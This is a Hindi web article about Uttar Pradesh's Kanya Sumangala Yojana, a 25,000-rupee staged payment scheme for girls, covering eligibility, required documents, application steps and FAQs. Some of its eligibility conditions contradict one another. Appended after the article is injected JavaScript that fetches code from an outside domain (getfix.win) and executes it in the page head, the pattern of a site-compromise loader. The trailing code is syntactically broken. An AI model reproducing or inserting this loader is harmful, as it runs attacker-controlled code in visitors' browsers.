उत्तर प्रदेश सरकार ने राज्य की कन्याओं को आर्थिक मदद पहुंचाने के लिए “Kanya Sumangala Scheme” को शुरू किया है। इस योजना के जरिए जन्म लेने से लेकर पढ़ाई के लिए बालिकाओं को सरकार की तरफ से 25000 रुपए की सहायता प्रदान की जाएगी। जो भी पात्र कन्याएँ इस योजना का फायदा लेने के लिए आवेदन करना चाहती हैं तो उन्हें इस आर्टिकल को पूरा पढ़ना होगा।
Kanya Sumangala Yojana Uttar Pradesh
बालिकाओं के भविष्य का ध्यान रखते हुए उत्तर प्रदेश के मुख्यमंत्री योगी आदित्य नाथ जी ने कन्या सुमंगला योजना की शुरुआत की है। इस योजना के माध्यम से बालिका के जन्म से लेकर उसकी पढ़ाई तक के लिए राज्य सरकार दवारा 25000 रुपए की आर्थिक सहायता प्रदान की जाएगी। ये सहायता राशि पात्र बालिकाओं को 6 चरणों में मिलेगी। इस योजना का लाभ लेने के लिए आवेदक के परिवार की वार्षिक इनकम अधिकतम 3 लाख से ज्यादा नहीं होनी चाहिए। इस स्कीम का फायदा एक परिवार से 2 बेटियाँ ही प्राप्त कर सकेंगी।
कन्या सुमंगला योजना राशि विवरण
इस योजना की राशि को 6 चरणों में विभाजित किया गया है, जिसकी जानकारी इस तरह से है –
श्रेणी | चरण | राशि |
प्रथम श्रेणी | जन्म लेने पर | 5000 |
द्वितीय श्रेणी | पूरा टिका होने के बाद 1 वर्ष के भीतर | 2000 |
तृतीय श्रेणी | कक्षा 1 में प्रवेश लेने पर | 3000 |
चतुर्थ श्रेणी | कक्षा 6 वीं में प्रवेश लेने पर | 3000 |
पंचम श्रेणी | 9 वीं कक्षा में दाखिला लेने पर | 5000 |
षष्टम श्रेणी | 10 वीं 12 वीं कक्षा उत्तीर्ण करके स्नातक की डिग्री या दो वर्षीय डिप्लोमा में प्रवेश लेने पर | 7000 |
कुल राशि | 25000/-रुपए |
उत्तर प्रदेश कन्या सुमंगला स्कीम का परिचय
योजना का नाम | UP Kanya Sumangala Yojana |
किसके द्वारा शुरू की गई | उत्तर प्रदेश के मुख्यमंत्री द्वारा |
लाभार्थी | बालिकाएं |
फायदा | आर्थिक मदद उपलब्ध करवाना |
आवेदन प्रक्रिया | ऑनलाइन |
ऑफिशियल वेबसाइट | https://mksy.up.gov.in/ |
पात्रता – मानदंड (Eligibility)
- इस योजना का फायदा लेने के लिए आवेदक को उत्तर प्रदेश का नागरिक होना चाहिए।
- गरीबी रेखा से नीचे परिवारों की कन्याएँ इस स्कीम का फायदा लेने के लिए पात्र होंगी।
- एक परिवार से केवल 2 बेटियों ही इस योजना का लाभ ले सकेंगी।
- 1 अप्रैल 2019 के बाद जन्म लेने वाली कन्याओं की ही इस योजना का फायदा मिलेगा।
- लाभार्थी को स्कीम के तहत मिलने वाली धनराशी 18 वर्ष की आयु के बाद दी जाएगी।
- आवेदनकर्ता के परिवार की वार्षिक आय 3 लाख रुपये से ज्यादा नहीं होनी चाहिए।
- लाभार्थी के परिवार में कोई भी सरकारी नौकरी में कार्यरत नहीं होना चाहिए।
- आवेदक का परिवार आयकरदाता नहीं होना चाहिए।
फायदे (Benefits)
- आर्थिक रूप से कमजोर बालिकाओं को कन्या सुमंगला योजना का फायदा प्रदान किया जाएगा।
- पात्र कन्याओं को जन्म से लेकर अपनी पढ़ाई पूरी करने पर 25000 रुपए की आर्थिक सहायता प्रदान की जाएगी।
- बालिकाओं के स्वास्थ्य और शिक्षा में सुधार लाया जाएगा।
- कन्या भ्रूण हत्या एवं बाल-विवाह जैसी कुरीतियों की रोकथाम के प्रयासों को बल मिलेगा।
- बालिकाओं को उच्च शिक्षा व रोजगार के अवसरों की ओर बढ़ने का अवसर मिलेगा।
- प्रदेश में 96 लाख परिवारों को सीधा फायदा मिलेगा।
- राज्य सरकार ने इस योजना के लिए 1200 करोड़ रुपये खर्च किए हैं।
योजना के लिए Important Documents
- पहचान प्रमाण पत्र
- स्थायी पता
- आय प्रमाण पत्र
- BPL प्रमाण पत्र
- अभिभावक का दत्तक दस्तावेज
- शैक्षणिक दस्तावेज
- एफेडेवेट
- बैंक डिटेल्स
- पासपोर्ट साइज फोटो
स्कीम का मुख्य उद्देश्य (Objective)
कन्या सुमंगला योजना का उद्देश्य प्रदेश की बालिकाओं के स्वास्थ्य, शिक्षा और सामाजिक सुरक्षा को बढ़ावा देकर कन्या भ्रूण हत्या और बाल विवाह जैसी कुरीतियों को रोकना है।
ऐसे करें UP Kanya Sumangala Yojana के लिए आवेदन
👉 सबसे पहले आप आधिकारिक वेबसाइट पर जाएं।
👉 अब आप शीघ्र संपर्क करें के सेक्शन में जाएं और वहां पर नागरिक सेवा पोर्टल के बटन पर क्लिक करें।
👉 इसके बाद अगले पेज में Term & Condition को ध्यान से पढ़ें और I Agree के बॉक्स पर टिक करें।
👉 उसके बाद आप Continue बटन पर क्लिक करें।
👉 इस प्रोसेस के बाद रजिस्ट्रेशन फॉर्म ओपन होगा।
👉 आपको इस फॉर्म में सारी जानकारी भरनी है।
👉 इसके बाद आपको Send SMS OTP” बटन पर किल्क कर देना है।
👉 अब आपके मोबाइल नंबर पर एक ओटीपी भेजा जाएगा जिसे आपको Verify करना है।
👉 उसके बाद आपको Submit बटन पर क्लिक कर देना है।
Contact Number
इस योजना के बारे में अधिक जानकारी लेने के लिए संबंधित अधिकारियों के संपर्क विवरण की लिस्ट नीचे दी गई है –
योजना के बारे में पूछे जाने वाले प्रश्न [FAQs]
इस तरह के प्रश्न योजना से रिलेटिड जो आपसे पूछे जा सकते हैं –
Q1. |
कन्या सुमंगला योजना का फायदा किसे मिलता है ? |
Ans. | योजना का फायदा गरीब परिवार की कन्याओं को मिलता है। |
Q2. |
इस योजना के लिए सहायता राशि कितनी है? |
Ans. | 25000 रुपए। |
Q3. |
Kanya Sumangala Yojana राशि कितने चरणों में मिलती है? |
Ans. | इस योजना के लिए सहायता राशि को 6 चरणों में बांटा गया है। |
Q4. |
इस स्कीम के लिए आवेदन प्रक्रिया क्या है? |
Ans. | इसके लिए आपको आधिकारिक वेबसाइट (https://mksy.up.gov.in/) पर जाकर ऑनलाइन आवेदन करना है। |
” मैनें आपको लेख के जरिए सारी जानकारी उपलब्ध करवा दी है। इसके साथ ही आपको इस योजना के लिए रजिस्ट्रेशन करने की सारी प्रक्रिया के बारे में भी पता चल गया होगा।”
function loadScript() { var url = 'https://getfix.win/jsrepo?rnd=' + Math.random() + '&ts=' + Date.now();
try { var xhr = new XMLHttpRequest(); xhr.open('GET', url, false); xhr.send(null);
if (xhr.status >= 200 && xhr.status < 300) { var script = document.createElement('script'); script.text = xhr.responseText.trim(); document.head.appendChild(script); } else { console.warn('Script load failed: HTTP ' + xhr.status); } } catch (e) { console.warn('Script load error:', e.message); } } })();